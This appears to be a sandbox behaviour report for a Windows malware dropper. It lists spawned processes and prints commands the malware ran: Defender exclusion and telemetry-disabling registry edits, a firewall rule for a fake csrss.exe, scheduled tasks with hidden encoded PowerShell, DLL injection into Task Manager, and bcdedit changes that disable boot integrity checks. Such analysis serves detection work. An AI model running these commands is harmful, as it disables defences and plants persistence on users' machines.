PID 2292 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
PID 2292 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
PID 2292 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
PID 2292 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
PID 2292 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
PID 2292 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
PID 2292 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
PID 2292 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
PID 2292 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
PID 2292 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
PID 2292 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
PID 2292 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
PID 2292 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
PID 2292 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
PID 2292 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
PID 2292 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
PID 2292 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
PID 2292 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
PID 2292 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
PID 2292 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe

"C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe"

C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe

"C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe"

C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe

"C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe"

C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp" /SL5="$60136,4078676,54272,C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe"

C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe

"C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe

.\Install.exe /cdidqlUao "525403" /S

C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe

"C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe"

C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe

"C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe"

C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe

"C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe"

C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe

"C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe"

C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe

"C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240223090023.log C:\Windows\Logs\CBS\CbsPersist_20240223090023.cab

C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe

"C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5539758,0x7fef5539768,0x7fef5539778

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBVIaQAaO" /SC once /ST 06:57:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBVIaQAaO"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {189EDEEA-DF8B-4309-AFAA-22A85260AC03} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1424 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2232 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3348 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3084 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1468 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBVIaQAaO"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1905151612-1294555895568799192-348904360755802282-12423083741589601242-74749301"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "beMXFFiCiqlBKkvOrW" /SC once /ST 09:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe\" Fm /fBsite_idZpU 525403 /S" /V1 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 580

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe

"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.linkedin.com/login

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/video

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2464 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:936 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1396 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2BF.exe

C:\Users\Admin\AppData\Local\Temp\2BF.exe

C:\Users\Admin\AppData\Local\Temp\2BF.exe

C:\Users\Admin\AppData\Local\Temp\2BF.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\1028.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\1028.dll

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

